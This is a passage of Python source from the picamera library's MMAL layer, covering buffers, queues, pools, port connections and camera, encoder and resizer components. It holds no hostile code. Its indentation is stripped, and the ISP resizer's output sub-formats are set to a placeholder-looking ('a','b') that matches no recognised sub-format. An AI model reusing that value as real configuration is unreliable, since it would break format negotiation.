def _get_offset(self):
return self._buf[0].offset
def _set_offset(self, value):
assert 0 <= value <= self.size
self._buf[0].offset = value
self.length = min(self.size - self.offset, self.length)
offset = property(_get_offset, _set_offset, doc="""\
The offset from the start of the buffer at which the data actually
begins. Defaults to 0. If this is set to a value which would force the
current :attr:`length` off the end of the buffer's :attr:`size`, then
:attr:`length` will be decreased automatically.
""")
def _get_length(self):
return self._buf[0].length
def _set_length(self, value):
assert 0 <= value <= self.size - self.offset
self._buf[0].length = value
length = property(_get_length, _set_length, doc="""\
The length of data held in the buffer. Must be less than or equal to
the allocated size of data held in :attr:`size` minus the data
:attr:`offset`. This attribute can be used to effectively blank the
buffer by setting it to zero.
""")
def _get_data(self):
with self as buf:
return ct.string_at(
ct.byref(buf, self._buf[0].offset),
self._buf[0].length)
def _set_data(self, value):
value_len = buffer_bytes(value)
if value_len:
if value_len > self.size:
raise PiCameraValueError(
'data is too large for buffer (%d > %d)' % (
value_len, self.size))
bp = ct.c_uint8 * value_len
try:
sp = bp.from_buffer(value)
except TypeError:
sp = bp.from_buffer_copy(value)
with self as buf:
ct.memmove(buf, sp, value_len)
self._buf[0].offset = 0
self._buf[0].length = value_len
data = property(_get_data, _set_data, doc="""\
The data held in the buffer as a :class:`bytes` string. You can set
this attribute to modify the data in the buffer. Acceptable values
are anything that supports the buffer protocol, and which contains
:attr:`size` bytes or less. Setting this attribute implicitly modifies
the :attr:`length` attribute to the length of the specified value and
sets :attr:`offset` to zero.
.. note::
Accessing a buffer's data via this attribute is relatively slow
(as it copies the buffer's data to/from Python objects). See the
:class:`MMALBuffer` documentation for details of a faster (but
more complex) method.
""")
def replicate(self, source):
"""
Replicates the *source* :class:`MMALBuffer`. This copies all fields
from the *source* buffer, including the internal :attr:`data` pointer.
In other words, after replication this buffer and the *source* buffer
will share the same block of memory for *data*.
The *source* buffer will also be referenced internally by this buffer
and will only be recycled once this buffer is released.
.. note::
This is fundamentally different to the operation of the
:meth:`copy_from` method. It is much faster, but imposes the burden
that two buffers now share data (the *source* cannot be released
until the replicant has been released).
"""
mmal_check(
mmal.mmal_buffer_header_replicate(self._buf, source._buf),
prefix='unable to replicate buffer')
def copy_from(self, source):
"""
Copies all fields (including data) from the *source*
:class:`MMALBuffer`. This buffer must have sufficient :attr:`size` to
store :attr:`length` bytes from the *source* buffer. This method
implicitly sets :attr:`offset` to zero, and :attr:`length` to the
number of bytes copied.
.. note::
This is fundamentally different to the operation of the
:meth:`replicate` method. It is much slower, but afterward the
copied buffer is entirely independent of the *source*.
"""
assert self.size >= source.length
source_len = source._buf[0].length
if source_len:
with self as target_buf, source as source_buf:
ct.memmove(target_buf, ct.byref(source_buf, source.offset), source_len)
self._buf[0].offset = 0
self._buf[0].length = source_len
self.copy_meta(source)
def copy_meta(self, source):
"""
Copy meta-data from the *source* :class:`MMALBuffer`; specifically this
copies all buffer fields with the exception of :attr:`data`,
:attr:`length` and :attr:`offset`.
"""
self._buf[0].cmd = source._buf[0].cmd
self._buf[0].flags = source._buf[0].flags
self._buf[0].dts = source._buf[0].dts
self._buf[0].pts = source._buf[0].pts
self._buf[0].type[0] = source._buf[0].type[0]
def acquire(self):
"""
Acquire a reference to the buffer. This will prevent the buffer from
being recycled until :meth:`release` is called. This method can be
called multiple times in which case an equivalent number of calls
to :meth:`release` must be made before the buffer will actually be
released.
"""
mmal.mmal_buffer_header_acquire(self._buf)
def release(self):
"""
Release a reference to the buffer. This is the opposing call to
:meth:`acquire`. Once all references have been released, the buffer
will be recycled.
"""
mmal.mmal_buffer_header_release(self._buf)
def reset(self):
"""
Resets all buffer header fields to default values.
"""
mmal.mmal_buffer_header_reset(self._buf)
def __enter__(self):
mmal_check(
mmal.mmal_buffer_header_mem_lock(self._buf),
prefix='unable to lock buffer header memory')
return ct.cast(
self._buf[0].data,
ct.POINTER(ct.c_uint8 * self._buf[0].alloc_size)).contents
def __exit__(self, *exc):
mmal.mmal_buffer_header_mem_unlock(self._buf)
return False
def __repr__(self):
if self._buf is not None:
return '<MMALBuffer object: flags=%s command=%s length=%d>' % (
''.join((
'S' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_FRAME_START else '_',
'E' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_FRAME_END else '_',
'K' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_KEYFRAME else '_',
'C' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_CONFIG else '_',
'M' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_CODECSIDEINFO else '_',
'X' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_EOS else '_',
)), {
0: 'none',
mmal.MMAL_EVENT_ERROR: 'error',
mmal.MMAL_EVENT_FORMAT_CHANGED: 'format-change',
mmal.MMAL_EVENT_PARAMETER_CHANGED: 'param-change',
mmal.MMAL_EVENT_EOS: 'end-of-stream',
}[self.command], self.length)
else:
return '<MMALBuffer object: ???>'
class MMALQueue(object):
"""
Represents an MMAL buffer queue. Buffers can be added to the queue with the
:meth:`put` method, and retrieved from the queue (with optional wait
timeout) with the :meth:`get` method.
"""
__slots__ = ('_queue', '_created')
def __init__(self, queue):
self._created = False
self._queue = queue
@classmethod
def create(cls):
self = cls(mmal.mmal_queue_create())
self._created = True
return self
def close(self):
if self._created:
mmal_queue_destroy(self._queue)
self._queue = None
def __len__(self):
return mmal.mmal_queue_length(self._queue)
def get(self, block=True, timeout=None):
"""
Get the next buffer from the queue. If *block* is ``True`` (the default)
and *timeout* is ``None`` (the default) then the method will block
until a buffer is available. Otherwise *timeout* is the maximum time to
wait (in seconds) for a buffer to become available. If a buffer is not
available before the timeout expires, the method returns ``None``.
Likewise, if *block* is ``False`` and no buffer is immediately
available then ``None`` is returned.
"""
if block and timeout is None:
buf = mmal.mmal_queue_wait(self._queue)
elif block and timeout is not None:
buf = mmal.mmal_queue_timedwait(self._queue, int(timeout * 1000))
else:
buf = mmal.mmal_queue_get(self._queue)
if buf:
return MMALBuffer(buf)
def put(self, buf):
"""
Place :class:`MMALBuffer` *buf* at the back of the queue.
"""
mmal.mmal_queue_put(self._queue, buf._buf)
def put_back(self, buf):
"""
Place :class:`MMALBuffer` *buf* at the front of the queue. This is
used when a buffer was removed from the queue but needs to be put
back at the front where it was originally taken from.
"""
mmal.mmal_queue_put_back(self._queue, buf._buf)
class MMALPool(object):
"""
Represents an MMAL pool containing :class:`MMALBuffer` objects. All active
ports are associated with a pool of buffers, and a queue. Instances can be
treated as a sequence of :class:`MMALBuffer` objects but this is only
recommended for debugging purposes; otherwise, use the :meth:`get_buffer`,
:meth:`send_buffer`, and :meth:`send_all_buffers` methods which work with
the encapsulated :class:`MMALQueue`.
"""
__slots__ = ('_pool', '_queue')
def __init__(self, pool):
self._pool = pool
super(MMALPool, self).__init__()
self._queue = MMALQueue(pool[0].queue)
def __len__(self):
return self._pool[0].headers_num
def __getitem__(self, index):
return MMALBuffer(self._pool[0].header[index])
@property
def queue(self):
"""
The :class:`MMALQueue` associated with the pool.
"""
return self._queue
def close(self):
if self._pool is not None:
mmal.mmal_pool_destroy(self._pool)
self._pool = None
def resize(self, new_count, new_size):
"""
Resizes the pool to contain *new_count* buffers with *new_size* bytes
allocated to each buffer.
*new_count* must be 1 or more (you cannot resize a pool to contain
no headers). However, *new_size* can be 0 which causes all payload
buffers to be released.
.. warning::
If the pool is associated with a port, the port must be disabled
when resizing the pool.
"""
mmal_check(
mmal.mmal_pool_resize(self._pool, new_count, new_size),
prefix='unable to resize pool')
def get_buffer(self, block=True, timeout=None):
"""
Get the next buffer from the pool's queue. See :meth:`MMALQueue.get`
for the meaning of the parameters.
"""
return self._queue.get(block, timeout)
def send_buffer(self, port, block=True, timeout=None):
"""
Get a buffer from the pool's queue and send it to *port*. *block* and
*timeout* act as they do in :meth:`get_buffer`. If no buffer is
available (for the values of *block* and *timeout*,
:exc:`~picamera.PiCameraMMALError` is raised).
"""
buf = self.get_buffer(block, timeout)
if buf is None:
raise PiCameraMMALError(mmal.MMAL_EAGAIN, 'no buffers available')
port.send_buffer(buf)
def send_all_buffers(self, port, block=True, timeout=None):
"""
Send all buffers from the queue to *port*. *block* and *timeout* act as
they do in :meth:`get_buffer`. If no buffer is available (for the
values of *block* and *timeout*, :exc:`~picamera.PiCameraMMALError` is
raised).
"""
for i in range(len(self._queue)):
self.send_buffer(port, block, timeout)
class MMALPortPool(MMALPool):
"""
Construct an MMAL pool for the number and size of buffers required by
the :class:`MMALPort` *port*.
"""
__slots__ = ('_port',)
def __init__(self, port):
pool = mmal.mmal_port_pool_create(
port._port, port._port[0].buffer_num, port._port[0].buffer_size)
if not pool:
raise PiCameraMMALError(
mmal.MMAL_ENOSPC,
'failed to create buffer header pool for port %s' % port.name)
super(MMALPortPool, self).__init__(pool)
self._port = port
def close(self):
if self._pool is not None:
mmal.mmal_port_pool_destroy(self._port._port, self._pool)
self._port = None
self._pool = None
super(MMALPortPool, self).close()
@property
def port(self):
return self._port
def send_buffer(self, port=None, block=True, timeout=None):
"""
Get a buffer from the pool and send it to *port* (or the port the pool
is associated with by default). *block* and *timeout* act as they do in
:meth:`MMALPool.get_buffer`.
"""
if port is None:
port = self._port
super(MMALPortPool, self).send_buffer(port, block, timeout)
def send_all_buffers(self, port=None, block=True, timeout=None):
"""
Send all buffers from the pool to *port* (or the port the pool is
associated with by default). *block* and *timeout* act as they do in
:meth:`MMALPool.get_buffer`.
"""
if port is None:
port = self._port
super(MMALPortPool, self).send_all_buffers(port, block, timeout)
class MMALBaseConnection(MMALObject):
"""
Abstract base class for :class:`MMALConnection` and
:class:`MMALPythonConnection`. Handles weakrefs to the source and
target ports, and format negotiation. All other connection details are
handled by the descendent classes.
"""
__slots__ = ('_source', '_target')
default_formats = ()
compatible_opaque_formats = {
('OPQV-single', 'OPQV-single'),
('OPQV-dual', 'OPQV-dual'),
('OPQV-strips', 'OPQV-strips'),
('OPQV-dual', 'OPQV-single'),
('OPQV-single', 'OPQV-dual'), # recent firmwares permit this
}
def __init__(
self, source, target, formats=default_formats):
super(MMALBaseConnection, self).__init__()
if not isinstance(source, (MMALPort, MMALPythonPort)):
raise PiCameraValueError('source is not a port')
if not isinstance(target, (MMALPort, MMALPythonPort)):
raise PiCameraValueError('target is not a port')
if source.type != mmal.MMAL_PORT_TYPE_OUTPUT:
raise PiCameraValueError('source is not an output port')
if target.type != mmal.MMAL_PORT_TYPE_INPUT:
raise PiCameraValueError('target is not an input port')
if source.connection is not None:
raise PiCameraValueError('source port is already connected')
if target.connection is not None:
raise PiCameraValueError('target port is already connected')
if formats is None:
formats = ()
self._source = source
self._target = target
try:
iter(formats)
except TypeError:
formats = (formats,)
self._negotiate_format(formats)
source._connection = self
target._connection = self
# Descendents continue with connection implementation...
def close(self):
if self._source is not None:
self._source._connection = None
self._source = None
if self._target is not None:
self._target._connection = None
self._target = None
def _negotiate_format(self, formats):
def copy_format():
self._source.commit()
self._target.copy_from(self._source)
self._target.commit()
def max_buffers():
self._source.buffer_count = self._target.buffer_count = max(
self._source.buffer_count, self._target.buffer_count)
self._source.buffer_size = self._target.buffer_size = max(
self._source.buffer_size, self._target.buffer_size)
# Filter out formats that aren't supported on both source and target
# ports. This is a little tricky as ports that support OPAQUE never
# claim they do (so we have to assume it's mutually supported)
mutually_supported = (
set(self._source.supported_formats) &
set(self._target.supported_formats)
) | {mmal.MMAL_ENCODING_OPAQUE}
formats = [f for f in formats if f in mutually_supported]
if formats:
# If there are any formats left to try, perform the negotiation
# with the filtered list. Again, there's some special casing to
# deal with the incompatible OPAQUE sub-formats
for f in formats:
if f == mmal.MMAL_ENCODING_OPAQUE:
if (self._source.opaque_subformat,
self._target.opaque_subformat) in self.compatible_opaque_formats:
self._source.format = mmal.MMAL_ENCODING_OPAQUE
else:
continue
else:
self._source.format = f
try:
copy_format()
except PiCameraMMALError as e:
if e.status != mmal.MMAL_EINVAL:
raise
continue
else:
max_buffers()
return
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'failed to negotiate port format')
else:
# If no formats are available to try (either from filtering or
# because none were given), assume the source port is set up
# properly. Just copy the format to the target and hope the caller
# knows what they're doing
try:
copy_format()
except PiCameraMMALError as e:
if e.status != mmal.MMAL_EINVAL:
raise
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'failed to copy source format to target port')
else:
max_buffers()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, exc_tb):
self.close()
@property
def source(self):
"""
The source :class:`MMALPort` or :class:`MMALPythonPort` of the
connection.
"""
return self._source
@property
def target(self):
"""
The target :class:`MMALPort` or :class:`MMALPythonPort` of the
connection.
"""
return self._target
class MMALConnection(MMALBaseConnection):
"""
Represents an MMAL internal connection between two components. The
constructor accepts arguments providing the *source* :class:`MMALPort` and
*target* :class:`MMALPort`.
The *formats* parameter specifies an iterable of formats (in preference
order) that the connection may attempt when negotiating formats between
the two ports. If this is ``None``, or an empty iterable, no negotiation
will take place and the source port's format will simply be copied to the
target port. Otherwise, the iterable will be worked through in order until
a format acceptable to both ports is discovered.
.. note::
The default *formats* list starts with OPAQUE; the class understands
the different OPAQUE sub-formats (see :ref:`mmal` for more information)
and will only select OPAQUE if compatible sub-formats can be used on
both ports.
The *callback* parameter can optionally specify a callable which will be
executed for each buffer that traverses the connection (providing an
opportunity to manipulate or drop that buffer). If specified, it must be a
callable which accepts two parameters: the :class:`MMALConnection` object
sending the data, and the :class:`MMALBuffer` object containing data. The
callable may optionally manipulate the :class:`MMALBuffer` and return it
to permit it to continue traversing the connection, or return ``None``
in which case the buffer will be released.
.. note::
There is a significant performance penalty for specifying a
callback between MMAL components as it requires buffers to be
copied from the GPU's memory to the CPU's memory and back again.
.. data:: default_formats
:annotation: = (MMAL_ENCODING_OPAQUE, MMAL_ENCODING_I420, MMAL_ENCODING_RGB24, MMAL_ENCODING_BGR24, MMAL_ENCODING_RGBA, MMAL_ENCODING_BGRA)
Class attribute defining the default formats used to negotiate
connections between MMAL components.
"""
__slots__ = ('_connection', '_callback', '_wrapper')
default_formats = (
mmal.MMAL_ENCODING_OPAQUE,
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
)
def __init__(
self, source, target, formats=default_formats, callback=None):
if not isinstance(source, MMALPort):
raise PiCameraValueError('source is not an MMAL port')
if not isinstance(target, MMALPort):
raise PiCameraValueError('target is not an MMAL port')
super(MMALConnection, self).__init__(source, target, formats)
self._connection = ct.POINTER(mmal.MMAL_CONNECTION_T)()
self._callback = callback
flags = mmal.MMAL_CONNECTION_FLAG_ALLOCATION_ON_INPUT
if callback is None:
flags |= mmal.MMAL_CONNECTION_FLAG_TUNNELLING
try:
mmal_check(
mmal.mmal_connection_create(
self._connection, source._port, target._port, flags),
prefix="Failed to create connection")
except:
self._connection = None
raise
def close(self):
if self._connection is not None:
mmal.mmal_connection_destroy(self._connection)
self._connection = None
self._wrapper = None
super(MMALConnection, self).close()
@property
def enabled(self):
"""
Returns ``True`` if the connection is enabled. Use :meth:`enable`
and :meth:`disable` to control the state of the connection.
"""
return bool(self._connection[0].is_enabled)
def enable(self):
"""
Enable the connection. When a connection is enabled, data is
continually transferred from the output port of the source to the input
port of the target component.
"""
def wrapper(connection):
buf = mmal.mmal_queue_get(connection[0].queue)
if buf:
buf = MMALBuffer(buf)
try:
modified_buf = self._callback(self, buf)
except:
buf.release()
raise
else:
if modified_buf is not None:
try:
self._target.send_buffer(modified_buf)
except PiCameraPortDisabled:
# Target port disabled; ignore the error
pass
else:
buf.release()
return
buf = mmal.mmal_queue_get(connection[0].pool[0].queue)
if buf:
buf = MMALBuffer(buf)
try:
self._source.send_buffer(buf)
except PiCameraPortDisabled:
# Source port has been disabled; ignore the error
pass
if self._callback is not None:
self._wrapper = mmal.MMAL_CONNECTION_CALLBACK_T(wrapper)
self._connection[0].callback = self._wrapper
self._source.params[mmal.MMAL_PARAMETER_ZERO_COPY] = True
self._target.params[mmal.MMAL_PARAMETER_ZERO_COPY] = True
mmal_check(
mmal.mmal_connection_enable(self._connection),
prefix="Failed to enable connection")
if self._callback is not None:
MMALPool(self._connection[0].pool).send_all_buffers(self._source)
def disable(self):
"""
Disables the connection.
"""
mmal_check(
mmal.mmal_connection_disable(self._connection),
prefix="Failed to disable connection")
self._wrapper = None
@property
def name(self):
return self._connection[0].name.decode('ascii')
def __repr__(self):
if self._connection is not None:
return '<MMALConnection "%s">' % self.name
else:
return '<MMALConnection closed>'
class MMALRawCamera(MMALBaseComponent):
"""
The MMAL "raw camera" component.
Don't use this! If you insist on using this anyway, read the forum post
about `raw sensor access`_ first.
.. raw sensor access: https://www.raspberrypi.org/forums/viewtopic.php?f=43&t=109137
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_RAW_CAMERA
opaque_input_subformats = ()
opaque_output_subformats = ('OPQV-single',)
class MMALCamera(MMALBaseComponent):
"""
Represents the MMAL camera component. This component has 0 input ports and
3 output ports. The intended use of the output ports (which in turn
determines the behaviour of those ports) is as follows:
* Port 0 is intended for preview renderers
* Port 1 is intended for video recording
* Port 2 is intended for still image capture
Use the ``MMAL_PARAMETER_CAMERA_CONFIG`` parameter on the control port to
obtain and manipulate the camera's configuration.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_CAMERA
opaque_output_subformats = ('OPQV-single', 'OPQV-dual', 'OPQV-strips')
annotate_structs = (
mmal.MMAL_PARAMETER_CAMERA_ANNOTATE_T,
mmal.MMAL_PARAMETER_CAMERA_ANNOTATE_V2_T,
mmal.MMAL_PARAMETER_CAMERA_ANNOTATE_V3_T,
)
def __init__(self):
global FIX_RGB_BGR_ORDER
super(MMALCamera, self).__init__()
if PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE] is None:
found = False
# try largest struct to smallest as later firmwares still happily
# accept earlier revision structures
# XXX do old firmwares reject too-large structs?
for struct in reversed(MMALCamera.annotate_structs):
try:
PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE] = struct
self.control.params[mmal.MMAL_PARAMETER_ANNOTATE]
except PiCameraMMALError:
pass
else:
found = True
break
if not found:
PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE] = None
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "unknown camera annotation structure revision")
if FIX_RGB_BGR_ORDER is None:
# old firmware lists BGR24 before RGB24 in supported_formats
for f in self.outputs[1].supported_formats:
if f == mmal.MMAL_ENCODING_BGR24:
FIX_RGB_BGR_ORDER = True
break
elif f == mmal.MMAL_ENCODING_RGB24:
FIX_RGB_BGR_ORDER = False
break
def _get_annotate_rev(self):
try:
return MMALCamera.annotate_structs.index(PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE]) + 1
except IndexError:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "unknown camera annotation structure revision")
def _set_annotate_rev(self, value):
try:
PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE] = MMALCamera.annotate_structs[value - 1]
except IndexError:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "invalid camera annotation structure revision")
annotate_rev = property(_get_annotate_rev, _set_annotate_rev, doc="""\
The annotation capabilities of the firmware have evolved over time and
several structures are available for querying and setting video
annotations. By default the :class:`MMALCamera` class will pick the
latest annotation structure supported by the current firmware but you
can select older revisions with :attr:`annotate_rev` for other purposes
(e.g. testing).
""")
class MMALCameraInfo(MMALBaseComponent):
"""
Represents the MMAL camera-info component. Query the
``MMAL_PARAMETER_CAMERA_INFO`` parameter on the control port to obtain
information about the connected camera module.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_CAMERA_INFO
info_structs = (
mmal.MMAL_PARAMETER_CAMERA_INFO_T,
mmal.MMAL_PARAMETER_CAMERA_INFO_V2_T,
)
def __init__(self):
super(MMALCameraInfo, self).__init__()
if PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO] is None:
found = False
# try smallest structure to largest as later firmwares reject
# older structures
for struct in MMALCameraInfo.info_structs:
try:
PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO] = struct
self.control.params[mmal.MMAL_PARAMETER_CAMERA_INFO]
except PiCameraMMALError:
pass
else:
found = True
break
if not found:
PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO] = None
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "unknown camera info structure revision")
def _get_info_rev(self):
try:
return MMALCameraInfo.info_structs.index(PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO]) + 1
except IndexError:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "unknown camera info structure revision")
def _set_info_rev(self, value):
try:
PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO] = MMALCameraInfo.info_structs[value - 1]
except IndexError:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "invalid camera info structure revision")
info_rev = property(_get_info_rev, _set_info_rev, doc="""\
The camera information capabilities of the firmware have evolved over
time and several structures are available for querying camera
information. When initialized, :class:`MMALCameraInfo` will attempt
to discover which structure is in use by the extant firmware. This
property can be used to discover the structure version and to modify
the version in use for other purposes (e.g. testing).
""")
class MMALComponent(MMALBaseComponent):
"""
Represents an MMAL component that acts as a filter of some sort, with a
single input that connects to an upstream source port. This is an asbtract
base class.
"""
__slots__ = ()
def __init__(self):
super(MMALComponent, self).__init__()
assert len(self.opaque_input_subformats) == 1
def close(self):
self.disconnect()
super(MMALComponent, self).close()
def enable(self):
super(MMALComponent, self).enable()
if self.connection is not None:
self.connection.enable()
def disable(self):
if self.connection is not None:
self.connection.disable()
super(MMALComponent, self).disable()
def connect(self, source, **options):
"""
Connects the input port of this component to the specified *source*
:class:`MMALPort` or :class:`MMALPythonPort`. Alternatively, as a
convenience (primarily intended for command line experimentation; don't
use this in scripts), *source* can be another component in which case
the first unconnected output port will be selected as *source*.
Keyword arguments will be passed along to the connection constructor.
See :class:`MMALConnection` and :class:`MMALPythonConnection` for
further information.
"""
if isinstance(source, (MMALPort, MMALPythonPort)):
return self.inputs[0].connect(source)
else:
for port in source.outputs:
if not port.connection:
return self.inputs[0].connect(port, **options)
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'no free output ports on %r' % source)
def disconnect(self):
"""
Destroy the connection between this component's input port and the
upstream component.
"""
self.inputs[0].disconnect()
@property
def connection(self):
"""
The :class:`MMALConnection` or :class:`MMALPythonConnection` object
linking this component to the upstream component.
"""
return self.inputs[0].connection
class MMALSplitter(MMALComponent):
"""
Represents the MMAL splitter component. This component has 1 input port
and 4 output ports which all generate duplicates of buffers passed to the
input port.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_VIDEO_SPLITTER
opaque_input_subformats = ('OPQV-single',)
opaque_output_subformats = ('OPQV-single',) * 4
class MMALISPResizer(MMALComponent):
"""
Represents the MMAL ISP resizer component. This component has 1 input port
and 1 output port, and supports resizing via the VideoCore ISP, along with
conversion of numerous formats into numerous other formats (e.g. OPAQUE to
RGB, etc). This is more efficient than :class:`MMALResizer` but is only
available on later firmware versions.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_ISP
opaque_input_subformats = ('OPQV-single',)
opaque_output_subformats = ('a','b',)
class MMALResizer(MMALComponent):
"""
Represents the MMAL VPU resizer component. This component has 1 input port
and 1 output port. This supports resizing via the VPU. This is not as
efficient as :class:`MMALISPResizer` but is available on all firmware
verions. The output port can (and usually should) have a different frame
size to the input port.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_RESIZER
opaque_input_subformats = (None,)
opaque_output_subformats = (None,)
class MMALEncoder(MMALComponent):
"""
Represents a generic MMAL encoder. This is an abstract base class.
"""
__slots__ = ()
class MMALVideoEncoder(MMALEncoder):
"""
Represents the MMAL video encoder component. This component has 1 input
port and 1 output port. The output port is usually configured with
``MMAL_ENCODING_H264`` or ``MMAL_ENCODING_MJPEG``.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_VIDEO_ENCODER
opaque_input_subformats = ('OPQV-dual',)
opaque_output_subformats = (None,)
class MMALImageEncoder(MMALEncoder):
"""
Represents the MMAL image encoder component. This component has 1 input
port and 1 output port. The output port is typically configured with
``MMAL_ENCODING_JPEG`` but can also use ``MMAL_ENCODING_PNG``,
``MMAL_ENCODING_GIF``, etc.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_IMAGE_ENCODER
opaque_input_subformats = ('OPQV-strips',)
opaque_output_subformats = (None,)
class MMALDecoder(MMALComponent):
"""
Represents a generic MMAL decoder. This is an abstract base class.
"""
__slots__ = ()
class MMALVideoDecoder(MMALDecoder):
"""
Represents the MMAL video decoder component. This component has 1 input
port and 1 output port. The input port is usually configured with
``MMAL_ENCODING_H264`` or ``MMAL_ENCODING_MJPEG``.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_VIDEO_DECODER
opaque_input_subformats = (None,)
opaque_output_subformats = ('OPQV-single',)
class MMALImageDecoder(MMALDecoder):
"""
Represents the MMAL iamge decoder component. This component has 1 input
port and 1 output port. The input port is usually configured with
``MMAL_ENCODING_JPEG``.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_IMAGE_DECODER
opaque_input_subformats = (None,)
opaque_output_subformats = ('OPQV-single',)
class MMALRenderer(MMALComponent):
"""
Represents the MMAL renderer component. This component has 1 input port and
0 output ports. It is used to implement the camera preview and overlays.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_VIDEO_RENDERER
opaque_input_subformats = ('OPQV-single',)
class MMALNullSink(MMALComponent):
"""
Represents the MMAL null-sink component. This component has 1 input port
and 0 output ports. It is used to keep the preview port "alive" (and thus
calculating white-balance and exposure) when the camera preview is not
required.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_NULL_SINK
opaque_input_subformats = ('OPQV-single',)
class MMALPythonPort(MMALObject):
"""
Implements ports for Python-based MMAL components.
"""
__slots__ = (
'_buffer_count',
'_buffer_size',
'_connection',
'_enabled',
'_owner',
'_pool',
'_type',
'_index',
'_supported_formats',
'_format',
'_callback',
)
_FORMAT_BPP = {
'I420': 1.5,
'RGB3': 3,
'RGBA': 4,
'BGR3': 3,
'BGRA': 4,
}
def __init__(self, owner, port_type, index):
self._buffer_count = 2
self._buffer_size = 0
self._connection = None
self._enabled = False
self._owner = weakref.ref(owner)
self._pool = None
self._callback = None
self._type = port_type
self._index = index
self._supported_formats = {
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
}
self._format = ct.pointer(mmal.MMAL_ES_FORMAT_T(
type=mmal.MMAL_ES_TYPE_VIDEO,
encoding=mmal.MMAL_ENCODING_I420,
es=ct.pointer(mmal.MMAL_ES_SPECIFIC_FORMAT_T())))
def close(self):
self.disconnect()
self.disable()
self._format = None
def __repr__(self):
return '<MMALPythonPort "%s": format=MMAL_FOURCC(%r) buffers=%dx%d frames=%s@%sfps>' % (
self.name, mmal.FOURCC_str(self.format), self.buffer_count,
self.buffer_size, self.framesize, self.framerate)
def _get_bitrate(self):
return self._format[0].bitrate
def _set_bitrate(self, value):
self._format[0].bitrate = value
bitrate = property(_get_bitrate, _set_bitrate, doc="""\
Retrieves or sets the bitrate limit for the port's format.
""")
def _get_supported_formats(self):
return self._supported_formats
def _set_supported_formats(self, value):
try:
value = {f for f in value}
except TypeError:
value = {value}
if not value:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "port must have at least one valid format")
self._supported_formats = value
supported_formats = property(_get_supported_formats, _set_supported_formats, doc="""\
Retrieves or sets the set of valid formats for this port. The set must
always contain at least one valid format. A single format can be
specified; it will be converted implicitly to a singleton set.
If the current port :attr:`format` is not a member of the new set, no
error is raised. An error will be raised when :meth:`commit` is next
called if :attr:`format` is still not a member of the set.
""")
def _get_format(self):
return self._format[0].encoding
def _set_format(self, value):
self._format[0].encoding = value
format = property(_get_format, _set_format, doc="""\
Retrieves or sets the encoding format of the port. Setting this
attribute implicitly sets the encoding variant to a sensible value
(I420 in the case of OPAQUE).
""")
def _get_framesize(self):
return PiResolution(
self._format[0].es[0].video.crop.width,
self._format[0].es[0].video.crop.height,
)
def _set_framesize(self, value):
value = to_resolution(value)
video = self._format[0].es[0].video
video.width = bcm_host.VCOS_ALIGN_UP(value.width, 32)
video.height = bcm_host.VCOS_ALIGN_UP(value.height, 16)
video.crop.width = value.width
video.crop.height = value.height
framesize = property(_get_framesize, _set_framesize, doc="""\
Retrieves or sets the size of the source's video frames as a (width,
height) tuple. This attribute implicitly handles scaling the given
size up to the block size of the camera (32x16).
""")
def _get_framerate(self):
video = self._format[0].es[0].video
try:
return Fraction(
video.frame_rate.num,
video.frame_rate.den)
except ZeroDivisionError:
return Fraction(0, 1)
def _set_framerate(self, value):
value = to_fraction(value)
video = self._format[0].es[0].video
video.frame_rate.num = value.numerator
video.frame_rate.den = value.denominator
framerate = property(_get_framerate, _set_framerate, doc="""\
Retrieves or sets the framerate of the port's video frames in fps.
""")
@property
def pool(self):
"""
Returns the :class:`MMALPool` associated with the buffer, if any.
"""
return self._pool
@property
def opaque_subformat(self):
return None
def _get_buffer_count(self):
return self._buffer_count
def _set_buffer_count(self, value):
if value < 1:
raise PiCameraMMALError(mmal.MMAL_EINVAL, 'buffer count <1')
self._buffer_count = int(value)
buffer_count = property(_get_buffer_count, _set_buffer_count, doc="""\
